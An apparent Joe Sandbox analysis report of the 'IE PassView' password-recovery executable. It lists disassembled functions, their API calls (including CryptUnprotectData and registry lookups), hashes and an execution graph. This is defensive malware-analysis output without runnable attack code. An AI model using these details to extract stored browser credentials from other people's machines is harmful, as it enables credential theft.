                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: ec10c122f22213a57c04daaa8a719b2651d2619166efef81b8aa6a8e6d18f33d
                                        • Instruction ID: dd39a4462d089017abb554cf892f1597ca5f1ae2b1321b0e7aa42a351a950413
                                        • Opcode Fuzzy Hash: ec10c122f22213a57c04daaa8a719b2651d2619166efef81b8aa6a8e6d18f33d
                                        • Instruction Fuzzy Hash: 84E046A2F0020102DB24BBFAAD80E13239C6B06714714C83FF0A0F72E1CEBCE858812C
                                        Function 0040AFA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 0040AFEA
                                        • SetFocus.USER32(?,?,?), ref: 0040B05F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FocusMessageSend
                                        • String ID: PP@
                                        • API String ID: 223698058-1603988326
                                        • Opcode ID: a591c2a69ec75bab7d69f01d74449903b34c731458baaccf1f926f7a7a23923f
                                        • Instruction ID: 319bb99eaa8ff1fd24b18a03bdff03010d5574ca49666b8ebf6ce1b114104e8d
                                        • Opcode Fuzzy Hash: a591c2a69ec75bab7d69f01d74449903b34c731458baaccf1f926f7a7a23923f
                                        • Instruction Fuzzy Hash: C26184306403009ACF20AF268885B9A73A4AF44724F15957EF8557F2F3C7BD9D848B9D
                                        Function 00406883 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405CBC: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00406955,00000000,00000000,?,00000020,?,;k@,00406AA3,?,?,;k@), ref: 00405CC9
                                        • _memicmp.MSVCRT ref: 0040689D
                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,;k@,?), ref: 004068B4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FilePointer_memicmpmemcpy
                                        • String ID: URL
                                        • API String ID: 2108176848-3574463123
                                        • Opcode ID: 77e25472ff670075c7f97fcb162713365679f11683cae8fb6ae8cf562b826c1f
                                        • Instruction ID: 665e656d3475a6bf1cfbb61beee9558f5cfe600d303d55f39d77dcf35973ee0d
                                        • Opcode Fuzzy Hash: 77e25472ff670075c7f97fcb162713365679f11683cae8fb6ae8cf562b826c1f
                                        • Instruction Fuzzy Hash: E311E372600208BBEB11DF65CC05F5F7BA8DF41344F114076F905AB291E675DE20CBA8
                                        Function 0040807F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00408098
                                        • SendMessageA.USER32(00405313,00001019,00000000,?), ref: 004080C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: "
                                        • API String ID: 568519121-123907689
                                        • Opcode ID: 9a7d89582f532bc70890e8afc89be4053827a8b7986d768eab8df2d64cc15a9b
                                        • Instruction ID: e68555285a0c4490628ba0bff90b7032afb0f75e8b8aad83eddb015787144be7
                                        • Opcode Fuzzy Hash: 9a7d89582f532bc70890e8afc89be4053827a8b7986d768eab8df2d64cc15a9b
                                        • Instruction Fuzzy Hash: 99012675800209ABDB209F85CD45AABB7F8FF80748F01843EE894A6280D735AD89CB75
                                        Function 004017EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        • Opcode ID: 5a05c266bdedffb439e2f54ad46894a2b709d4cd4d07083fca0107005192a64c
                                        • Instruction ID: 4e6ba43d21752e254f0c685461c49d150c1a378d92c6c6ef6facbe126f5418e5
                                        • Opcode Fuzzy Hash: 5a05c266bdedffb439e2f54ad46894a2b709d4cd4d07083fca0107005192a64c
                                        • Instruction Fuzzy Hash: 32F01271700204EFEB14EF95D989F9A73A8AF04700F144479F909AB1D1DBB8AA408769
                                        Function 0040CCAF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040CC6A: RegOpenKeyExA.ADVAPI32(00000104,00000104,00000000,00000104,?,0040CCCC,00406B01,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?,00020019,00000104,?,?,00406B01,?), ref: 0040CC7C
                                          • Part of subcall function 0040CC83: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,-k@,0040CF70,-k@,?,?), ref: 0040CC9C
                                        • RegCloseKey.ADVAPI32(?,?,?,00406B01,?,?,00000104,?), ref: 0040CCEF
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040CCBD
                                        • History, xrefs: 0040CCD3
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: History$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 3677997916-155329520
                                        • Opcode ID: 9a7c009a4a0090f5ae32a9f5cc615a3b887c4cd60392eaddaaaf0a82d0086411
                                        • Instruction ID: 40915cfe07f95d23653045c7b485d250b31a45d2323b856462e04dbed85f8fc2
                                        • Opcode Fuzzy Hash: 9a7c009a4a0090f5ae32a9f5cc615a3b887c4cd60392eaddaaaf0a82d0086411
                                        • Instruction Fuzzy Hash: CEE09271704204FAFB009767DD86E5E7AA9EB88704B140576FD06F01D1F6B59E106519
                                        Function 0040269F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00401347: LoadLibraryA.KERNEL32(00000000), ref: 00401362
                                          • Part of subcall function 00401347: GetProcAddress.KERNEL32(00000000,00000000), ref: 00401384
                                          • Part of subcall function 00401347: FreeLibrary.KERNEL32(00000000), ref: 00401394
                                        • _mbscpy.MSVCRT(?,CryptUnprotectData,?,00402616), ref: 004026D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc_mbscpy
                                        • String ID: CryptUnprotectData$s!@
                                        • API String ID: 1197458902-1069634633
                                        • Opcode ID: 8915081f3bdc83493648566d05fa38e6f61e27e7050aa0aaebedd2f7e7695979
                                        • Instruction ID: b43d03ea36532b2251421e96c6422d4be167c69b69b272a6b3e18bd6c711dbf8
                                        • Opcode Fuzzy Hash: 8915081f3bdc83493648566d05fa38e6f61e27e7050aa0aaebedd2f7e7695979
                                        • Instruction Fuzzy Hash: 33E09A316057418ED3259F3EA400146BBE4AFA93007108C7FE0E9E3682E3B8A1888B48
                                        Function 004077E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00407681: GetModuleHandleA.KERNEL32(?,004075F3,00000006,?,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040768B
                                        • LoadMenuA.USER32(00000000), ref: 004077EF
                                        • sprintf.MSVCRT ref: 00407812
                                          • Part of subcall function 00407692: GetMenuItemCount.USER32(?), ref: 004076A8
                                          • Part of subcall function 00407692: memset.MSVCRT ref: 004076CC
                                          • Part of subcall function 00407692: GetMenuItemInfoA.USER32(?), ref: 00407702
                                          • Part of subcall function 00407692: memset.MSVCRT ref: 0040772F
                                          • Part of subcall function 00407692: strchr.MSVCRT ref: 0040773B
                                          • Part of subcall function 00407692: _mbscat.MSVCRT ref: 00407796
                                          • Part of subcall function 00407692: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004077B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountHandleInfoLoadModifyModule_mbscatsprintfstrchr
                                        • String ID: menu_%d
                                        • API String ID: 4172168873-2417748251
                                        • Opcode ID: e08113b4f4dec7348a4a6fc84922e34cdf80e249ac662aab87a7d9f07f746284
                                        • Instruction ID: ed01b0685e68dfe62216100cf5cd09ec08e200f8416e5a7f6d04a15b753ff6f9
                                        • Opcode Fuzzy Hash: e08113b4f4dec7348a4a6fc84922e34cdf80e249ac662aab87a7d9f07f746284
                                        • Instruction Fuzzy Hash: 5BD0C231E4411036DA20772AAD4EF8B2C195BC2765F14467FF100B50D2D7FD50A682AF
                                        Function 00407F76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040576E: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00405786,?,0040251E,?,00000000,00000104), ref: 00405779
                                        • strrchr.MSVCRT ref: 00407F7F
                                        • _mbscat.MSVCRT ref: 00407F94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileModuleName_mbscatstrrchr
                                        • String ID: _lng.ini
                                        • API String ID: 3334749609-1948609170
                                        • Opcode ID: d474001b8c86a43bcc698c6d163b9548e9ae5c4590142ad4a842e8331724842e
                                        • Instruction ID: a1e3aa308b82fc5673dd92debc305a3ebfc9ae380083a4930ba50b3689042e33
                                        • Opcode Fuzzy Hash: d474001b8c86a43bcc698c6d163b9548e9ae5c4590142ad4a842e8331724842e
                                        • Instruction Fuzzy Hash: AFC0801194965014E12632321E03B4F01494F13314F34047BFC00351C7DFFE655540BF
                                        Function 00408104 Relevance: 5.1, APIs: 4, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405B39: memset.MSVCRT ref: 00405B47
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 0040811E
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 00408145
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 00408166
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 00408187
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: 76163ed7dae31f195b1dd4358d4c6b7beabcde7d5895f71dd40c0dd104b5668d
                                        • Instruction ID: 975eb5f541548b53aa2b2683ab10cc57e713382b47fe4237ca15f91c7a93a1f7
                                        • Opcode Fuzzy Hash: 76163ed7dae31f195b1dd4358d4c6b7beabcde7d5895f71dd40c0dd104b5668d
                                        • Instruction Fuzzy Hash: 8B21C4B0A017008ED7119F6A8985912FAE4FF90311B2AC8AFD589DF2B2D7B8D805DF15
                                        Function 00405F98 Relevance: 5.1, APIs: 4, Instructions: 65stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 00405FA9
                                          • Part of subcall function 00405708: malloc.MSVCRT ref: 00405724
                                          • Part of subcall function 00405708: memcpy.MSVCRT(00000000,00000000,?,00000000,?,0040295B,00000001,?,?,00000000,00401BF3,?), ref: 0040573C
                                          • Part of subcall function 00405708: free.MSVCRT ref: 00405745
                                        • free.MSVCRT ref: 00405FCC
                                        • free.MSVCRT ref: 00405FEF
                                        • memcpy.MSVCRT(00000002,004069FD,000000FF,?,00000001,00000000,?,00406058,00000000,00000000,004069FD), ref: 0040600F
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocstrlen
                                        • String ID:
                                        • API String ID: 3669619086-0
                                        • Opcode ID: d0548e40a4bde75448c6d029b042ce7427e62ca5b2dff442f528b2f56d8fedb0
                                        • Instruction ID: c59032f8cc353ebac638978e1c106deb410c7d9e303b29f677ad7929833933cc
                                        • Opcode Fuzzy Hash: d0548e40a4bde75448c6d029b042ce7427e62ca5b2dff442f528b2f56d8fedb0
                                        • Instruction Fuzzy Hash: F4216D71204A05DFC730EF18D880996B7FAEF44324B108A2EF865ABAD1C739B9198B55
                                        Function 0040749E Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00008000,0040752E,004027DA,IE PassView), ref: 004074C6
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,0040752E,004027DA,IE PassView), ref: 004074E4
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407502
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407512
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: d599127abd47b856bbc0423ba27791b299d38375ce06d93440a2571d77ceda39
                                        • Instruction ID: 5c6c35779c63f8cfc2dd024f26b4d0c78e317132225820d7cc514954e4d0415a
                                        • Opcode Fuzzy Hash: d599127abd47b856bbc0423ba27791b299d38375ce06d93440a2571d77ceda39
                                        • Instruction Fuzzy Hash: B2F062B09512009FE748DB75EE467A53AA0A708304F00C03EA146CB2F1EBF454689F0C

                                        Execution Graph

                                        Execution Coverage:6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0.1%
                                        Total number of Nodes:1302
                                        Total number of Limit Nodes:94
                                        execution_graph 20791 40ce42 20792 40ce63 CloseHandle 20791->20792 20793 40ce53 20792->20793 20794 40ce6c 20792->20794 20793->20794 20795 40ce5b Sleep 20793->20795 20795->20792 22351 42b041 _XcptFilter 21098 40a849 FindResourceW 21099 40a862 SizeofResource 21098->21099 21102 40a88c 21098->21102 21100 40a873 LoadResource 21099->21100 21099->21102 21101 40a881 LockResource 21100->21101 21100->21102 21101->21102 22355 40204a 19 API calls 22356 40144c 11 API calls 22357 407a4f 7 API calls 22358 42b452 _onexit __dllonexit 22359 40ae50 21 API calls 22360 404451 39 API calls 22363 42b055 _exit _c_exit 22365 41ee58 28 API calls 22366 4168c7 112 API calls 22368 4289c9 22 API calls 22369 40705f memset _snwprintf SendMessageW 22370 418e63 28 API calls 22373 41ea66 18 API calls 22376 41b468 45 API calls 22381 409277 61 API calls 22385 4168c7 87 API calls 20796 40d402 20812 40d2cb 20796->20812 20798 40d411 20799 40d418 20798->20799 20821 40cc6d 20798->20821 20802 40d461 DeleteFileA 20805 40d489 GetFileAttributesA 20802->20805 20803 40d42d DeleteFileW 20804 40d455 GetFileAttributesW 20803->20804 20806 40d43d 20804->20806 20807 40d45f 20804->20807 20808 40d471 20805->20808 20809 40d493 free 20805->20809 20806->20809 20810 40d44a Sleep DeleteFileW 20806->20810 20807->20809 20808->20809 20811 40d47e Sleep DeleteFileA 20808->20811 20809->20799 20810->20804 20811->20805 20813 40cc6d GetVersionExW 20812->20813 20814 40d2d0 20813->20814 20824 40ccb6 MultiByteToWideChar malloc MultiByteToWideChar free 20814->20824 20817 40d2e3 20818 40d2ea 20817->20818 20825 40cd61 AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 20817->20825 20818->20798 20820 40d2f3 free 20820->20798 20822 40cca8 20821->20822 20823 40cc7f GetVersionExW 20821->20823 20822->20802 20822->20803 20823->20822 20824->20817 20825->20820 22386 41a603 141 API calls 22387 40a803 memset _itow WritePrivateProfileStringW GetPrivateProfileIntW 22389 4168c7 88 API calls 22390 411207 21 API calls 22391 428c0a 21 API calls 22397 406218 16 API calls 22398 408619 113 API calls 22399 40d21b 21 API calls 22402 40d62c 51 API calls 22404 413e2c 11 API calls 22406 428e2b 170 API calls 22408 4168c7 127 API calls 22410 406c3b _wcsicmp 22412 417b33 77 API calls 22414 401ec2 CompareFileTime 22415 408ec3 34 API calls 22416 41bec4 138 API calls 21103 42b4cf 21104 42b4d8 ??3@YAXPAX 21103->21104 21105 42b4df 21103->21105 21104->21105 21106 42b4e8 ??3@YAXPAX 21105->21106 21107 42b4ef 21105->21107 21106->21107 21108 42b4f8 ??3@YAXPAX 21107->21108 21109 42b4ff 21107->21109 21108->21109 21110 42b508 ??3@YAXPAX 21109->21110 21111 42b50f 21109->21111 21110->21111 22421 4164cf 24 API calls 21112 40a8cf EnumResourceNamesW 22424 406ed3 12 API calls 22426 41f8d4 28 API calls 22427 40c8da strlen 22428 4040dd 23 API calls 22429 428edf 19 API calls 22431 40a4e0 34 API calls 22432 4286e2 21 API calls 22433 4288e1 173 API calls 22435 418ce6 17 API calls 22436 41eeeb 28 API calls 22437 408eec 104 API calls 22438 4286ee 134 API calls 22439 4168c7 87 API calls 21765 417af3 21766 417b0b 21765->21766 21771 4168c7 21765->21771 21767 411013 62 API calls 21766->21767 21769 417b13 21767->21769 21768 416998 21780 40b4a0 16 API calls 21768->21780 21769->21771 21777 417b33 21769->21777 21771->21768 21775 416b5c 21771->21775 21779 414172 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21771->21779 21773 416fe7 21781 415583 86 API calls 21775->21781 21777->21773 21782 40b4a0 16 API calls 21777->21782 21778 419112 21779->21771 21780->21775 21781->21773 21782->21778 22444 418cfa 15 API calls 22451 42b48e ??3@YAXPAX 21783 42ae90 21802 42b0a0 21783->21802 21785 42ae9c GetModuleHandleA 21786 42aeac __set_app_type __p__fmode __p__commode 21785->21786 21788 42af40 21786->21788 21789 42af54 21788->21789 21790 42af48 __setusermatherr 21788->21790 21803 42b08c _controlfp 21789->21803 21790->21789 21792 42af59 _initterm __wgetmainargs _initterm 21793 42afac 21792->21793 21794 42afba GetStartupInfoW 21792->21794 21796 42b002 GetModuleHandleA 21794->21796 21804 409720 21796->21804 21800 42b032 exit 21801 42b039 _cexit 21800->21801 21801->21793 21802->21785 21803->21792 21845 4033d0 LoadLibraryW 21804->21845 21806 409734 21807 409738 21806->21807 21854 40a8ea 21806->21854 21807->21800 21807->21801 21816 4097e0 21913 406503 17 API calls 21816->21913 21817 40982a 21890 406404 memset 21817->21890 21820 4097ef ??3@YAXPAX 21822 409811 DeleteObject 21820->21822 21823 40997f 21820->21823 21822->21823 21915 40543b free free 21823->21915 21824 405766 _wcsicmp 21825 409840 21824->21825 21825->21820 21828 40985e CoInitialize 21825->21828 21895 40963e 21825->21895 21827 409990 21916 405942 free 21827->21916 21914 409457 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 21828->21914 21832 409999 21917 40543b free free 21832->21917 21834 40986e 6 API calls 21837 409947 CoUninitialize ??3@YAXPAX 21834->21837 21838 4098d9 21834->21838 21837->21823 21839 40996b DeleteObject 21837->21839 21840 4098df TranslateAcceleratorW 21838->21840 21842 409911 IsDialogMessageW 21838->21842 21843 409905 IsDialogMessageW 21838->21843 21839->21823 21840->21838 21841 409939 GetMessageW 21840->21841 21841->21837 21841->21840 21842->21841 21844 409923 TranslateMessage DispatchMessageW 21842->21844 21843->21841 21843->21842 21844->21841 21846 403423 6F551CD0 21845->21846 21847 4033fb GetProcAddress 21845->21847 21850 40342c 21846->21850 21848 403414 FreeLibrary 21847->21848 21849 40340b 21847->21849 21848->21846 21851 40341f 21848->21851 21849->21848 21852 403433 MessageBoxW 21850->21852 21853 40344a 21850->21853 21851->21850 21852->21806 21853->21806 21855 40a8f3 LoadLibraryW 21854->21855 21856 409743 SetErrorMode GetModuleHandleW EnumResourceTypesW 21854->21856 21855->21856 21857 40a907 GetProcAddress 21855->21857 